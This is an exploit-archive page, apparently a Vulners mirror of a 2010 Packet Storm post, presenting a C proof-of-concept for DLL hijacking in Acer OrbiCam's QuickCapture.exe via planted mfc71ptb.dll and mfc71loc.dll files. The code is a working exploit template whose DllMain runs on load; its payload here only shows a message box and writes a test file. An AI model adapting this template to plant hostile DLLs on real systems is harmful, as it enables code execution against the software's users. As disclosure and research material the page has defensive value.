Lucene search
K

Acer OrbiCam 9.4.4.1084 DLL Hijacking

🗓️ 19 Oct 2010 00:00:00Reported by Inj3cti0n P4ck3tType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 25 Views

Acer OrbiCam 9.4.4.1084 DLL Hijacking Windows XP QuickCapture.ex

Code
`  
  
  
/*  
*  
* Acer OrbiCam 9.4.4.1084 DLL Hijacking Exploit (mfc71ptb.dll and mfc71loc.dll)  
*  
* Author: Inj3cti0n P4ck3t  
*  
* Contact e-mail: [email protected]  
*  
* Date: 18-10-2010  
*  
* Operating System: Windows XP (Version 5.1 Service Pack 3)  
*  
* Name Application: QuickCapture.exe  
*  
* Software Acer Orbicam 9.4.4.1084  
*  
* Name DLL: mfc71ptb.dll and mfc71loc.dll   
*  
* Greetz: fvox - HADES - M4V3RiCk - T4ph0d4 - DD3str0y3r - C00l3r - Archit3ct - Red Eye Crew  
*   
*  
*/  
  
  
  
#include <windows.h>  
#include <stdio.h>  
  
int teste()  
{  
MessageBox(0, "Test", "and Test", MB_OK);  
FILE *fp;  
fp = fopen("teste.txt", "w");  
fwrite("it works ;-)", 1, 12, fp);  
fclose(fp);  
exit(1);  
  
return 0;  
}  
  
BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)  
{  
teste();  
return TRUE;  
}  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation